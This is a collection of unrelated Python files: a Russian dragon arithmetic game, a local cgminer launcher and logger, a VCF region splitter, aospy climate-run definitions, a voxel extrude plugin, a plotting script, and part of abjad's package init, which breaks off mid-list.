            reply = annoying_input_int('Ответ:')
            if dragon.check_answer(reply):
                hero.attack(dragon)
                print('Верно! \n** дракон кричит от боли **')
            else:
                dragon.attack(hero)
                print('Ошибка! \n** вам нанесён удар... **')
        if not dragon.is_alive():
            print('Дракон', dragon._color, 'повержен!\n')
        else:
            # The dragon survived, so the hero must have fallen -- stop.
            break
    if hero.is_alive():
        print('Поздравляем! Вы победили!')
        print('Ваш накопленный опыт:', hero._experience)
    else:
        print('К сожалению, Вы проиграли...')
def start_game():
    """Entry point: greet the player, create the hero, run the tournament.

    Catches EOFError so a closed input stream ends the game gracefully
    instead of crashing with a traceback.
    """
    try:
        print('Добро пожаловать в арифметико-ролевую игру с драконами!')
        print('Представьтесь, пожалуйста: ', end = '')
        hero = Hero(input())
        dragon_number = 3
        dragon_list = generate_dragon_list(dragon_number)
        # Sanity-check against the requested count instead of a magic "3",
        # so changing dragon_number cannot silently break this assert.
        assert len(dragon_list) == dragon_number
        print('У Вас на пути', dragon_number, 'драконов!')
        game_tournament(hero, dragon_list)
    except EOFError:
        print('Поток ввода закончился. Извините, принимать ответы более невозможно.')
|
# Names of the doctest-bearing test modules driven by the loop below.
__all__ = [
    "test_config_db",
    "test_grid",
    "test_shell",
    "test_svn",
    ]

if __name__ == "__main__" :
    import doctest
    # Column width: longest module name plus one, so the results line up.
    fmt = "%%-%ds: %%s" % (max(map(len, __all__)) + 1)
    for i in __all__ :
        # BUG FIX: the old form ``print (fmt) % args`` only parses as
        # intended on Python 2; format first, then print, which works on
        # both Python 2 and 3.
        print(fmt % (i, doctest.testmod(__import__(i, None, None, [i, ], ), ), ))
|
import socket
import json
import sys
import subprocess
import time
import os
# Absolute path of the cgminer binary and of the log file that receives
# the one-shot device-status snapshots appended below.
path = "/home/ltcminer/mining/cgminer/cgminer"
log_file = "/home/ltcminer/mining/minerlite.log"
def linesplit(socket):
    """Drain *socket* until recv() returns empty; return everything received.

    Returns None when nothing at all was received before the peer closed.
    """
    buffer = socket.recv(4096)
    while True:
        more = socket.recv(4096)
        if not more:
            break
        buffer = buffer + more
    if buffer:
        return buffer
def retrieve_cgminer_info(command, parameter):
    """Query the local cgminer JSON API and return the raw response string.

    command   -- cgminer API command name, e.g. "devs".
    parameter -- optional command parameter; omitted from the request
                 when falsy.
    """
    api_ip = '127.0.0.1'
    api_port = 4028
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((api_ip, int(api_port)))
        # BUG FIX: the branches were inverted -- the parameter was only
        # sent when it was *missing*.  Include it exactly when supplied.
        if parameter:
            s.send(json.dumps({"command": command, "parameter": parameter}))
        else:
            s.send(json.dumps({"command": command}))
        response = linesplit(s)
        # cgminer terminates its reply with a NUL byte; strip before parsing.
        response = response.replace('\x00', '')
        return_val = response
        # Parse only to validate that the reply is well-formed JSON.
        response = json.loads(response)
    finally:
        # Close the socket even on error (the old code leaked it on failure).
        s.close()
    return return_val
def run_cgminer(path):
    """Launch cgminer at *path* with its JSON API enabled, then wait briefly.

    The --api-listen flag makes cgminer answer status queries (used by
    retrieve_cgminer_info above).  The process is left running in the
    background; only a short startup delay is awaited here.
    """
    subprocess.Popen([path, "--api-listen"])
    print "Starting cgminer in 2 seconds"
    time.sleep(2)
    print "Running cgminer ..."
# Start the miner, give its API time to come up, then append a one-shot
# device-status snapshot to the log file.
run_cgminer(path)
time.sleep(15)
with open(log_file, 'a') as logfile:
    try:
        logfile.write( retrieve_cgminer_info("devs", None) )
    except socket.error:
        # The API may not be reachable yet; skip this snapshot silently.
        pass
|
import re
import sys
import os
import getopt
import vcf
def main():
    """Split VCF contigs into regions holding a fixed number of PIS.

    Reads the VCF named on the command line, counts parsimony-informative
    sites (PIS) per contig, and emits a region boundary every
    ``params.force`` PIS.  Regions are written to "out.regions".
    """
    params = parseArgs()
    vfh = vcf.Reader(open(params.vcf, 'r'))

    # grab contig sizes: contig name -> length, needed to close the last region.
    contigs = dict()
    for c, s in vfh.contigs.items():
        contigs[s.id] = s.length

    regions = list()
    this_chrom = None
    start = 1
    stop = 1
    count = 0
    for rec in vfh:
        if not this_chrom:
            this_chrom = rec.CHROM
            start = 1
            stop = 1
            count = 0
        # If we entered a new chromosome, close the previous one to its end.
        elif this_chrom != rec.CHROM:
            regions.append((this_chrom, start, contigs[this_chrom]))
            this_chrom = rec.CHROM
            start = 1
            stop = 1
            count = 0
        # Only SNPs that are polymorphic can be parsimony-informative.
        if rec.is_snp and not rec.is_monomorphic:
            if is_PIS(rec):
                count += 1
                # Reached the requested number of PIS: emit a region break.
                if count == params.force:
                    stop = rec.POS
                    regions.append((this_chrom, start, stop))
                    start = stop + 1
                    count = 0
    # Close the final region.  BUG FIX: guard against an empty VCF, where
    # this_chrom is still None and the old code raised KeyError.
    if this_chrom is not None:
        regions.append((this_chrom, start, contigs[this_chrom]))
    print("Writing regions to out.regions...")
    write_regions("out.regions", regions)
def write_regions(f, r):
    """Write regions *r* (sequences of (chrom, start, stop)) to file *f*.

    One region per line in "chrom:start-stop" format.  Exits the program
    with status 1 if the file cannot be written.
    """
    try:
        # The with-block closes the handle automatically, even on error
        # (the old explicit finally/close was redundant).
        with open(f, 'w') as fh:
            for reg in r:
                fh.write(str(reg[0]) + ":" + str(reg[1]) + "-" + str(reg[2]) + "\n")
    except IOError as e:
        # BUG FIX: the old message said "read" although this function writes.
        print("Could not write file %s: %s" % (f, e))
        sys.exit(1)
    except Exception as e:
        print("Unexpected error writing file %s: %s" % (f, e))
        sys.exit(1)
def is_PIS(r):
    """Return True if VCF record *r* is a parsimony-informative site.

    A site is parsimony-informative when at least two samples carry the
    reference allele and at least two carry the alternate allele.
    PyVCF call.gt_type values: 0 = hom-ref, 1 = het, 2 = hom-alt,
    None = missing/uncalled.
    """
    ref = 0
    alt = 0
    for call in r.samples:
        # BUG FIX: the old guard ``if call.gt_type:`` treated homozygous-
        # reference calls (gt_type == 0, falsy) as missing, making the
        # ``== 0`` branch unreachable and ref permanently zero.  Only
        # genuinely missing calls (gt_type is None) are skipped now.
        if call.gt_type is None:
            continue
        if call.gt_type == 0:
            # Homozygous reference sample.
            ref += 1
        elif call.gt_type == 1:
            # Heterozygous: supports both alleles.
            ref += 1
            alt += 1
        elif call.gt_type == 2:
            # Homozygous alternate sample.
            alt += 1
    # BUG FIX: the old pair of ifs fell through and returned None for
    # e.g. ref=3/alt=1; return an explicit boolean for every input.
    return ref >= 2 and alt >= 2
class parseArgs():
    """Parse and validate the command-line arguments for findBreaksVCF."""
    def __init__(self):
        #Define options
        try:
            # BUG FIX: a comma was missing between "vcf=" and "help",
            # which concatenated them into the bogus long option
            # "vcf=help" and broke --vcf.
            options, remainder = getopt.getopt(sys.argv[1:], 'v:f:h', \
            ["vcf=", "help", "force="])
        except getopt.GetoptError as err:
            print(err)
            self.display_help("\nExiting because getopt returned non-zero exit status.")
        #Default values for params
        #Input params
        self.vcf = None
        self.force = 100000
        #First pass to see if help menu was called
        for o, a in options:
            if o in ("-h", "-help", "--help"):
                self.display_help("Exiting because help menu was called.")
        #Second pass to set all args.
        for opt, arg_raw in options:
            # Normalize the value and strip leading dashes off the option name.
            arg = arg_raw.replace(" ", "").strip()
            opt = opt.replace("-", "")
            if opt in ('v', 'vcf'):
                self.vcf = arg
            elif opt in ('f', 'force'):
                self.force = int(arg)
            elif opt in ('h', 'help'):
                pass
            else:
                assert False, "Unhandled option %r" % opt
        #Check manditory options are set
        if not self.vcf:
            self.display_help("Must provide VCF file <-v,--vcf>")

    def display_help(self, message=None):
        """Print usage information (plus *message*, if given) and exit."""
        if message is not None:
            print()
            print (message)
        print ("\nfindBreaksVCF.py\n")
        print ("Contact:Tyler K. Chafin, University of Arkansas,tkchafin@uark.edu")
        print ("\nUsage: ", sys.argv[0], "-v <input.vcf> -f <100000>\n")
        print ("Description: Breaks chromosomes into chunks of X parsimony-informative sites, for running MDL")
        print("""
	Arguments:
		-v,--vcf	: VCF file for parsing
		-f,--force	: Number of PIS to force a break
		-h,--help	: Displays help menu
	""")
        print()
        sys.exit()

if __name__ == '__main__':
    main()
|
from aospy import Run
# aospy Run declarations for the AM2/SM2.1 aerosol-forcing experiment set.
# Each Run points at a GFDL post-processing archive and records the span
# and chunking of its netCDF output.
am2_control = Run(
    name='am2_control',
    description=(
        'Preindustrial control simulation.'
    ),
    data_in_direc=('/archive/Yi.Ming/sm2.1_fixed/'
                   'SM2.1U_Control-1860_lm2_aie_rerun6.YIM/pp'),
    data_in_dur=5,
    data_in_start_date='0001-01-01',
    data_in_end_date='0080-12-31',
    default_date_range=('0021-01-01', '0080-12-31'),
    idealized=False
)
am2_tropics = Run(
    name='am2_tropics',
    description=(
        'Anthropogenic sulfate aerosol forcing only in the'
        ' Northern Hemisphere tropics (EQ to 30N)'
    ),
    data_in_direc=('/archive/Yi.Ming/sm2.1_fixed/'
                   'SM2.1U_Control-1860_lm2_aie2_tropical_rerun6.YIM/pp'),
    data_in_dur=5,
    data_in_start_date='0001-01-01',
    data_in_end_date='0080-12-31',
    default_date_range=('0021-01-01', '0080-12-31'),
    idealized=False
)
am2_extratropics = Run(
    name='am2_extratropics',
    description=(
        'Anthropogenic sulfate aerosol forcing only in the'
        ' Northern Hemisphere extratropics (30N to Pole)'
    ),
    data_in_direc=('/archive/Yi.Ming/sm2.1_fixed/'
                   'SM2.1U_Control-1860_lm2_aie2_extropical_rerun6.YIM/pp'),
    data_in_dur=5,
    data_in_start_date='0001-01-01',
    data_in_end_date='0080-12-31',
    default_date_range=('0021-01-01', '0080-12-31'),
    idealized=False
)
am2_tropics_and_extratropics = Run(
    name='am2_tropics+extratropics',
    description=(
        'Anthropogenic sulfate aerosol forcing everywhere'
    ),
    data_in_direc=('/archive/Yi.Ming/sm2.1_fixed/'
                   'SM2.1U_Control-1860_lm2_aie2_rerun6.YIM/pp'),
    data_in_dur=5,
    data_in_start_date='0001-01-01',
    data_in_end_date='0080-12-31',
    default_date_range=('0021-01-01', '0080-12-31'),
    idealized=False
)
am2_HadISST_control = Run(
    name='am2_HadISST_control',
    description=(
        '1981-2000 HadISST climatological annual cycle of SSTs and sea '
        'ice repeated annually, with PD atmospheric composition.'
    ),
    data_in_direc=('/archive/yim/siena_201203/m45_am2p14_1990/'
                   'gfdl.ncrc2-intel-prod/pp'),
    data_in_dur=16,
    data_in_start_date='1983-01-01',
    data_in_end_date='1998-12-31',
    default_date_range=('1983-01-01', '1998-12-31'),
    idealized=False
)
# Fixed-SST (Reynolds OI climatology) control and perturbation runs.
am2_reyoi_control = Run(
    name='am2_reyoi_control',
    tags=['reyoi', 'cont'],
    description='PI atmos and Reynolds OI climatological SSTs',
    data_in_direc=('/archive/Spencer.Hill/am2/am2clim_reyoi/'
                   'gfdl.ncrc2-default-prod/pp'),
    data_in_dur=1,
    data_in_start_date='1982-01-01',
    data_in_end_date='1998-12-31',
    default_date_range=('1983-01-01', '1998-12-31'),
    idealized=False
)
am2_reyoi_extratropics_full = Run(
    name='am2_reyoi_extratropics_full',
    description=(
        'Full SST anomaly pattern applied to REYOI fixed SST climatology.'),
    data_in_direc=('/archive/Spencer.Clark/am2/'
                   'am2clim_reyoi_extratropics_full/'
                   'gfdl.ncrc2-default-prod/pp'),
    data_in_dur=17,
    data_in_start_date='1982-01-01',
    data_in_end_date='1998-12-31',
    default_date_range=('1983-01-01', '1998-12-31'),
    idealized=False
)
am2_reyoi_extratropics_sp = Run(
    name='am2_reyoi_extratropics_sp',
    description=(
        'Spatial Pattern SST anomaly pattern applied to'
        ' REYOI fixed SST climatology.'),
    data_in_direc=('/archive/Spencer.Clark/am2/'
                   'am2clim_reyoi_extratropics_sp/gfdl.ncrc2-default-prod/pp'),
    data_in_dur=17,
    data_in_start_date='1982-01-01',
    data_in_end_date='1998-12-31',
    default_date_range=('1983-01-01', '1998-12-31'),
    idealized=False
)
am2_reyoi_tropics_sp_SI = Run(
    name='am2_reyoi_tropics_sp_SI',
    description=(
        'Spatial Pattern SST anomaly pattern applied to REYOI fixed SST'
        ' climatology.'),
    data_in_direc=('/archive/Spencer.Clark/am2/'
                   'am2clim_reyoi_tropics_sp_SI/gfdl.ncrc2-default-prod/pp'),
    data_in_dur=17,
    data_in_start_date='1982-01-01',
    data_in_end_date='1998-12-31',
    default_date_range=('1983-01-01', '1998-12-31'),
    idealized=False
)
am2_reyoi_tropics_full = Run(
    name='am2_reyoi_tropics_full',
    description=(
        'Full SST anomaly pattern applied to REYOI fixed SST climatology.'),
    data_in_direc=('/archive/Spencer.Clark/am2/'
                   'am2clim_reyoi_tropics_full/gfdl.ncrc2-default-prod/pp'),
    data_in_dur=17,
    data_in_start_date='1982-01-01',
    data_in_end_date='1998-12-31',
    default_date_range=('1983-01-01', '1998-12-31'),
    idealized=False
)
am2_reyoi_extratropics_sp_SI = Run(
    name='am2_reyoi_extratropics_sp_SI',
    description=(
        'Spatial Pattern SST anomaly pattern applied to REYOI fixed'
        ' SST climatology. Fixed sea-ice.'),
    data_in_direc=('/archive/Spencer.Clark/am2/'
                   'am2clim_reyoi_extratropics_sp_SI/'
                   'gfdl.ncrc2-default-prod/pp'),
    data_in_dur=17,
    data_in_start_date='1982-01-01',
    data_in_end_date='1998-12-31',
    default_date_range=('1983-01-01', '1998-12-31'),
    idealized=False
)
am2_reyoi_extratropics_u = Run(
    name='am2_reyoi_extratropics_u',
    description=(
        'Uniform SST anomaly pattern applied to REYOI fixed SST climatology.'),
    data_in_direc=('/archive/Spencer.Clark/am2/'
                   'am2clim_reyoi_extratropics_u/gfdl.ncrc2-default-prod/pp'),
    data_in_dur=17,
    data_in_start_date='1982-01-01',
    data_in_end_date='1998-12-31',
    default_date_range=('1983-01-01', '1998-12-31'),
    idealized=False
)
am2_reyoi_tropics_u = Run(
    name='am2_reyoi_tropics_u',
    description=(
        'Uniform SST anomaly pattern applied to REYOI fixed SST climatology.'),
    data_in_direc=('/archive/Spencer.Clark/am2/'
                   'am2clim_reyoi_tropics_u/gfdl.ncrc2-default-prod/pp'),
    data_in_dur=17,
    data_in_start_date='1982-01-01',
    data_in_end_date='1998-12-31',
    default_date_range=('1983-01-01', '1998-12-31'),
    idealized=False
)
|
import unittest
from dumpformat import dumpManager
#try to save .test.xml does not work, why ?
class mltriesTest(unittest.TestCase):
    """Tests for dumpManager save/load round-tripping."""
    def setUp(self):
        # Fresh manager instance for every test.
        self.d = dumpManager()
    def test_init(self):
        # Saving to a fresh path should succeed without raising.
        self.d.save("./test.xml")
    # BUG FIX: removed the dangling "def test_" stub that was left here --
    # it was a syntax error preventing this module from importing at all.
    def test_load(self):
        pass
        #TODO
        #save then load and compare
if __name__ == '__main__':
    unittest.main()
|
from PySide import QtGui, QtCore
from tool import Tool, EventData, MouseButtons, KeyModifiers, Face
from plugin_api import register_plugin
class ExtrudeTool(Tool):
    """Drag tool that repeatedly stamps the current voxel selection along one axis."""

    def __init__(self, api):
        super(ExtrudeTool, self).__init__(api)
        # Create our action / icon
        self.action = QtGui.QAction(QtGui.QPixmap(":/images/gfx/icons/border-bottom-thick.png"), "Extrude", None)
        self.action.setStatusTip("Extude region")
        self.action.setCheckable(True)
        self.action.setShortcut(QtGui.QKeySequence("Ctrl+0"))
        # Register the tool
        self.priority = 10
        self.api.register_tool(self)
        # Area tool helper
        self._mouse = None          # last mouse position used as drag anchor
        self._stamp = []            # snapshot of the selection: (x, y, z, colour)
        # Which axes the extrusion is still allowed to move along.
        self.xdir = True
        self.ydir = True
        self.zdir = True
        self.pastoffset = 0         # accumulated extrusion distance in voxels
        self.fixeddirection = False # True when X/Y/Z key locked the axis

    def drawstamp(self, data, dx, dy, dz):
        """Paint the stamped selection at offset (dx, dy, dz), skipping occupied voxels."""
        for x, y, z, col in self._stamp:
            tgt = data.voxels.get(x + dx, y + dy, z + dz)
            if tgt == 0:
                # Only fill empty voxels; True/1 flags appear to batch this
                # into an undo fill -- confirm against the voxel API.
                data.voxels.set(x + dx, y + dy, z + dz, col, True, 1)
        data.voxels.completeUndoFill()

    def on_drag_start(self, data):
        """Snapshot the selection and choose the extrusion axis (X/Y/Z key locks it)."""
        if len(data.voxels._selection) > 0:
            self._stamp = []
            for x, y, z in data.voxels._selection:
                col = data.voxels.get(x, y, z)
                self._stamp.append((x, y, z, col))
            self._mouse = (data.mouse_x, data.mouse_y)
            # Holding X, Y or Z restricts the extrusion to that axis only.
            if QtCore.Qt.Key_X in data.keys:
                self.xdir = True
                self.ydir = False
                self.zdir = False
                self.fixeddirection = True
            elif QtCore.Qt.Key_Y in data.keys:
                self.xdir = False
                self.ydir = True
                self.zdir = False
                self.fixeddirection = True
            elif QtCore.Qt.Key_Z in data.keys:
                self.xdir = False
                self.ydir = False
                self.zdir = True
                self.fixeddirection = True
            else:
                # No key held: the first significant drag direction decides.
                self.xdir = True
                self.ydir = True
                self.zdir = True
                self.fixeddirection = False
            self.pastoffset = 0
    # When dragging, create the selection

    def on_drag(self, data):
        """Translate mouse motion into voxel offsets and stamp along the chosen axis."""
        # In case the first click has missed a valid target.
        if self._mouse is None or len(self._stamp) == 0:
            return
        dx = data.mouse_x - self._mouse[0]
        dy = data.mouse_y - self._mouse[1]
        # Work out some sort of vague translation between screen and voxels
        sx = self.api.mainwindow.width() / data.voxels.width
        sy = self.api.mainwindow.height() / data.voxels.height
        dx = int(round(dx / float(sx)))
        dy = int(round(dy / float(sy)))
        if dx == 0 and dy == 0:
            return
        # Work out translation for x,y
        # ax/ay: which world axes the screen's horizontal/vertical map onto.
        ax, ay = self.api.mainwindow.display.view_axis()
        # t{x,y,z}: step direction (+/-1); td{x,y,z}: raw magnitude per axis.
        tx = 0
        ty = 0
        tz = 0
        tdx = 0
        tdy = 0
        tdz = 0
        if ax == self.api.mainwindow.display.X_AXIS:
            tdx = dx
            if dx > 0:
                tx = 1
            elif dx < 0:
                tx = -1
        elif ax == self.api.mainwindow.display.Y_AXIS:
            tdy = dx
            if dx > 0:
                ty = 1
            elif dx < 0:
                ty = -1
        elif ax == self.api.mainwindow.display.Z_AXIS:
            tdz = dx
            if dx > 0:
                tz = 1
            elif dx < 0:
                tz = -1
        if ay == self.api.mainwindow.display.X_AXIS:
            tdx = dy
            if dy > 0:
                tx = 1
            elif dy < 0:
                tx = -1
        elif ay == self.api.mainwindow.display.Y_AXIS:
            tdy = dy
            # Screen Y grows downwards, so vertical drag inverts the Y step.
            if dy > 0:
                ty = -1
            elif dy < 0:
                ty = 1
        elif ay == self.api.mainwindow.display.Z_AXIS:
            tdz = dy
            if dy > 0:
                tz = 1
            elif dy < 0:
                tz = -1
        if self.fixeddirection:
            # Axis was locked with a key: only ever step along that axis.
            if self.xdir:
                if tx != 0:
                    self._mouse = (data.mouse_x, data.mouse_y)
                    self.pastoffset += tx
                    self.drawstamp(data, self.pastoffset, 0, 0)
            elif self.ydir:
                if ty != 0:
                    self._mouse = (data.mouse_x, data.mouse_y)
                    self.pastoffset += ty
                    self.drawstamp(data, 0, self.pastoffset, 0)
            elif self.zdir:
                if tz != 0:
                    self._mouse = (data.mouse_x, data.mouse_y)
                    self.pastoffset += tz
                    self.drawstamp(data, 0, 0, self.pastoffset)
        else:
            # First significant movement wins: once an axis is chosen the
            # other two are disabled for the rest of the drag.
            if tx != 0 and self.xdir and (not self.ydir or (abs(tdx) > abs(tdy) and abs(tdx) > abs(tdz))):
                self._mouse = (data.mouse_x, data.mouse_y)
                self.ydir = False
                self.zdir = False
                self.pastoffset += tx
                self.drawstamp(data, self.pastoffset, 0, 0)
            elif ty != 0 and self.ydir and (not self.zdir or abs(tdy) > abs(tdz)):
                self._mouse = (data.mouse_x, data.mouse_y)
                self.xdir = False
                self.zdir = False
                self.pastoffset += ty
                self.drawstamp(data, 0, self.pastoffset, 0)
            elif tz != 0 and self.zdir:
                self._mouse = (data.mouse_x, data.mouse_y)
                self.xdir = False
                self.ydir = False
                self.pastoffset += tz
                self.drawstamp(data, 0, 0, self.pastoffset)

    def on_drag_end(self, data):
        """Move the selection onto the final stamped position."""
        data.voxels.clear_selection()
        dx = self.pastoffset if self.xdir else 0
        dy = self.pastoffset if self.ydir else 0
        dz = self.pastoffset if self.zdir else 0
        for x, y, z, col in self._stamp:
            data.voxels.select(x + dx, y + dy, z + dz)

register_plugin(ExtrudeTool, "Extrude Tool", "1.0")
|
import matplotlib.pyplot as plt
import scipy as sp

# Path of the position log and fixed view box [xmin, xmax, ymin, ymax].
arq = 'CurvaGiro/pos.dat'
v = [-10, 1000, 0, 1000]
xl = r'y metros'
yl = r'x metros'

# BUG FIX: reuse the path constant instead of repeating the literal (the
# old code defined `arq` but then hard-coded the same file name again).
# NOTE(review): sp.genfromtxt is the deprecated NumPy re-export in SciPy;
# switch to numpy.genfromtxt when upgrading -- confirm SciPy version.
x = sp.genfromtxt(arq)

# Column 2 against column 1: the turning-circle trajectory, black line.
a = plt.plot(x[:, 2], x[:, 1], 'k-')
plt.grid(True, 'both', color='0.8', linestyle='--', linewidth=1)
plt.axis(v)
plt.xlabel(xl)
plt.ylabel(yl)
# BUG FIX: pyplot.show() takes no plot handle; passing the line list
# relied on it being swallowed by a deprecated signature.
plt.show()
|
from quicktions import Fraction
from . import (
_update,
deprecated,
enumerate,
format,
get,
illustrators,
io,
iterate,
iterpitches,
lyconst,
lyenv,
makers,
mutate,
persist,
string,
wf,
)
from ._version import __version__, __version_info__
from .bind import Wrapper, annotate, attach, detach
from .bundle import LilyPondFormatBundle, SlotContributions
from .configuration import (
Configuration,
list_all_classes,
list_all_functions,
yield_all_modules,
)
from .contextmanagers import (
ContextManager,
FilesystemState,
ForbidUpdate,
NullContextManager,
ProgressIndicator,
RedirectedStreams,
TemporaryDirectory,
TemporaryDirectoryChange,
Timer,
)
from .cyclictuple import CyclicTuple
from .duration import Duration, Multiplier, NonreducedFraction, Offset
from .dynamic import Dynamic
from .enums import (
Center,
Comparison,
Down,
Exact,
HorizontalAlignment,
Left,
Less,
Middle,
More,
Right,
Up,
VerticalAlignment,
)
from .exceptions import (
AssignabilityError,
ImpreciseMetronomeMarkError,
LilyPondParserError,
MissingMetronomeMarkError,
ParentageError,
PersistentIndicatorError,
SchemeParserFinishedError,
UnboundedTimeIntervalError,
WellformednessError,
)
from .format import lilypond
from .get import Lineage
from .illustrators import illustrate
from .indicators import (
Arpeggio,
Articulation,
BarLine,
BeamCount,
BendAfter,
BreathMark,
Clef,
ColorFingering,
Fermata,
Glissando,
KeyCluster,
KeySignature,
LaissezVibrer,
MarginMarkup,
MetronomeMark,
Mode,
Ottava,
RehearsalMark,
Repeat,
RepeatTie,
StaffChange,
StaffPosition,
StartBeam,
StartGroup,
StartHairpin,
StartMarkup,
StartPhrasingSlur,
StartPianoPedal,
StartSlur,
StartTextSpan,
StartTrillSpan,
StemTremolo,
StopBeam,
StopGroup,
StopHairpin,
StopPhrasingSlur,
StopPianoPedal,
StopSlur,
StopTextSpan,
StopTrillSpan,
Tie,
TimeSignature,
)
from .instruments import (
Accordion,
AltoFlute,
AltoSaxophone,
AltoTrombone,
AltoVoice,
BaritoneSaxophone,
BaritoneVoice,
BassClarinet,
BassFlute,
BassSaxophone,
BassTrombone,
BassVoice,
Bassoon,
Cello,
ClarinetInA,
ClarinetInBFlat,
ClarinetInEFlat,
Contrabass,
ContrabassClarinet,
ContrabassFlute,
ContrabassSaxophone,
Contrabassoon,
EnglishHorn,
Flute,
FrenchHorn,
Glockenspiel,
Guitar,
Harp,
Harpsichord,
Instrument,
Marimba,
MezzoSopranoVoice,
Oboe,
Percussion,
Piano,
Piccolo,
SopraninoSaxophone,
SopranoSaxophone,
SopranoVoice,
StringNumber,
TenorSaxophone,
TenorTrombone,
TenorVoice,
Trumpet,
Tuba,
Tuning,
Vibraphone,
Viola,
Violin,
Xylophone,
)
from .io import graph, show
from .label import ColorMap
from .lilypondfile import Block, LilyPondFile
from .lyproxy import (
LilyPondContext,
LilyPondEngraver,
LilyPondGrob,
LilyPondGrobInterface,
)
from .makers import LeafMaker, NoteMaker
from .markups import Markup
from .math import Infinity, NegativeInfinity
from .meter import Meter, MeterList, MetricAccentKernel
from .metricmodulation import MetricModulation
from .obgc import OnBeatGraceContainer, on_beat_grace_container
from .overrides import (
IndexedTweakManager,
IndexedTweakManagers,
Interface,
LilyPondLiteral,
LilyPondOverride,
LilyPondSetting,
OverrideInterface,
SettingInterface,
TweakInterface,
override,
setting,
tweak,
)
from .parentage import Parentage
from .parsers import parser
from .parsers.base import Parser
from .parsers.parse import parse
from .pattern import Pattern, PatternTuple
from .pcollections import (
IntervalClassSegment,
IntervalClassSet,
IntervalSegment,
IntervalSet,
PitchClassSegment,
PitchClassSet,
PitchRange,
PitchSegment,
PitchSet,
Segment,
Set,
TwelveToneRow,
)
from .pitch import (
Accidental,
Interval,
IntervalClass,
NamedInterval,
NamedIntervalClass,
NamedInversionEquivalentIntervalClass,
NamedPitch,
NamedPitchClass,
NumberedInterval,
NumberedIntervalClass,
NumberedInversionEquivalentIntervalClass,
NumberedPitch,
NumberedPitchClass,
Octave,
Pitch,
PitchClass,
PitchTyping,
)
from .ratio import NonreducedRatio, Ratio
from .score import (
AfterGraceContainer,
BeforeGraceContainer,
Chord,
Cluster,
Component,
Container,
Context,
DrumNoteHead,
Leaf,
MultimeasureRest,
Note,
NoteHead,
NoteHeadList,
Rest,
Score,
Skip,
Staff,
StaffGroup,
TremoloContainer,
Tuplet,
Voice,
)
from .select import LogicalTie, Selection
from .setclass import SetClass
from .spanners import (
beam,
glissando,
hairpin,
horizontal_bracket,
ottava,
phrasing_slur,
piano_pedal,
slur,
text_spanner,
tie,
trill_spanner,
)
from .tag import Line, Tag, activate, deactivate
from .timespan import OffsetCounter, Timespan, TimespanList
from .typedcollections import TypedCollection, TypedFrozenset, TypedList, TypedTuple
from .typings import (
DurationSequenceTyping,
DurationTyping,
IntegerPair,
IntegerSequence,
Number,
NumberPair,
PatternTyping,
Prototype,
RatioSequenceTyping,
RatioTyping,
Strings,
)
from .verticalmoment import (
VerticalMoment,
iterate_leaf_pairs,
iterate_pitch_pairs,
iterate_vertical_moments,
)
# Package-level aliases for Pattern's index helpers (presumably
# static/class constructors on Pattern -- confirm against pattern.py).
index = Pattern.index
index_all = Pattern.index_all
index_first = Pattern.index_first
index_last = Pattern.index_last
# Public API of the package, consumed by ``from abjad import *``.
# BUG FIX: removed "Expression" -- it is not imported or defined anywhere
# in this module, so star-importing the package raised AttributeError.
__all__ = [
    "Accidental",
    "Accordion",
    "AfterGraceContainer",
    "AltoFlute",
    "AltoSaxophone",
    "AltoTrombone",
    "AltoVoice",
    "Arpeggio",
    "Articulation",
    "AssignabilityError",
    "BarLine",
    "BaritoneSaxophone",
    "BaritoneVoice",
    "BassClarinet",
    "BassFlute",
    "BassSaxophone",
    "BassTrombone",
    "BassVoice",
    "Bassoon",
    "BeamCount",
    "BeforeGraceContainer",
    "BendAfter",
    "Block",
    "BreathMark",
    "Cello",
    "Center",
    "Chord",
    "ClarinetInA",
    "ClarinetInBFlat",
    "ClarinetInEFlat",
    "Clef",
    "Cluster",
    "ColorFingering",
    "ColorMap",
    "Comparison",
    "Component",
    "Configuration",
    "Container",
    "Context",
    "ContextManager",
    "Contrabass",
    "ContrabassClarinet",
    "ContrabassFlute",
    "ContrabassSaxophone",
    "Contrabassoon",
    "CyclicTuple",
    "Down",
    "DrumNoteHead",
    "Duration",
    "DurationSequenceTyping",
    "DurationTyping",
    "Dynamic",
    "EnglishHorn",
    "Exact",
    "Fermata",
    "FilesystemState",
    "Flute",
    "ForbidUpdate",
    "Fraction",
    "FrenchHorn",
    "Glissando",
    "Glockenspiel",
    "Guitar",
    "Harp",
    "Harpsichord",
    "HorizontalAlignment",
    "ImpreciseMetronomeMarkError",
    "IndexedTweakManager",
    "IndexedTweakManagers",
    "Infinity",
    "Instrument",
    "IntegerPair",
    "IntegerSequence",
    "Interface",
    "Interval",
    "IntervalClass",
    "IntervalClassSegment",
    "IntervalClassSet",
    "IntervalSegment",
    "IntervalSet",
    "KeyCluster",
    "KeySignature",
    "LaissezVibrer",
    "Leaf",
    "LeafMaker",
    "Left",
    "Less",
    "LilyPondContext",
    "LilyPondEngraver",
    "LilyPondFile",
    "LilyPondFormatBundle",
    "LilyPondGrob",
    "LilyPondGrobInterface",
    "LilyPondLiteral",
    "LilyPondOverride",
    "LilyPondParserError",
    "LilyPondSetting",
    "Line",
    "Lineage",
    "LogicalTie",
    "MarginMarkup",
    "Marimba",
    "Markup",
    "Meter",
    "MeterList",
    "MetricAccentKernel",
    "MetricModulation",
    "MetronomeMark",
    "MezzoSopranoVoice",
    "Middle",
    "MissingMetronomeMarkError",
    "Mode",
    "More",
    "MultimeasureRest",
    "Multiplier",
    "NamedInterval",
    "NamedIntervalClass",
    "NamedInversionEquivalentIntervalClass",
    "NamedPitch",
    "NamedPitchClass",
    "NegativeInfinity",
    "NonreducedFraction",
    "NonreducedRatio",
    "Note",
    "NoteHead",
    "NoteHeadList",
    "NoteMaker",
    "NullContextManager",
    "Number",
    "NumberPair",
    "NumberedInterval",
    "NumberedIntervalClass",
    "NumberedInversionEquivalentIntervalClass",
    "NumberedPitch",
    "NumberedPitchClass",
    "Oboe",
    "Octave",
    "Offset",
    "OffsetCounter",
    "OnBeatGraceContainer",
    "Ottava",
    "OverrideInterface",
    "Parentage",
    "ParentageError",
    "Parser",
    "Pattern",
    "PatternTuple",
    "PatternTyping",
    "Percussion",
    "PersistentIndicatorError",
    "Piano",
    "Piccolo",
    "Pitch",
    "PitchClass",
    "PitchClassSegment",
    "PitchClassSet",
    "PitchRange",
    "PitchSegment",
    "PitchSet",
    "PitchTyping",
    "ProgressIndicator",
    "Prototype",
    "Ratio",
    "RatioSequenceTyping",
    "RatioTyping",
    "RedirectedStreams",
